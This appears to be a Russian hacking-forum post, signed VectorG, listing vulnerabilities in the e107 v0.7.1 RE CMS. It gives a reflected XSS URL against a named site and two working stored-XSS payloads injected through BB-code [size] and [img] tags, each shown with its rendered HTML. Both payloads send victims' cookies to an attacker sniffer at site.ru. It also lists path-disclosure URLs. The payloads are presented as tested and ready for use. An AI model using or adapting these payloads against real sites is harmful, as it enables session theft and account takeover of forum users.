Многочисленные уязвимости e107 v0.7.1 RE
_http://e107.ru/
1. Пасивная XSS
_http://e107.ru/news.php/<script>alert(document.cookies)</script>
Толку от неё мало, но вдруг кому-нибудь понадобится
2. Активные XSS
Здесь всё более серьёзно...
Итак, уязвимы bb теги, фильтруется символ < и иногда ", остальное пропускается.
а)
[size=22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' ]xss[/size]
На выходе получаем:
PHP код:
<span style='font-size:22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' px'>xss</span>
Как только жертва проводит мышкой по ссылке, cookies отправляются на ваш сниффер.
б)
[img*]http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' [/img*]
* - убрать
На выходе получаем:
PHP код:
<img src='http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = 'http://site.ru/cgi-bin/s.jpg?'+document.cookie;' ' class='bbcode' alt='' style='vertical-align:middle; border:0' />
Как только жертва проводит мышкой по картинке, cookies отправляются на ваш сниффер.
Эти bb теги используются для написания сообщений на форуме, и изменения данных в профиле.
Все было проверено мной на: IE 7 Beta, Opera 8.54 и Firefox 1.5.0.3, все cookies пришли
3. Раскрытие пути
На закуску
_http://e107.ru/e107_plugins/content/plugin.php
_http://e107.ru/e107_plugins/list_new/plugin.php
Их очень много, в основном в файлах, находящихся в папке e107_plugins.
Antichat.ru © VectorG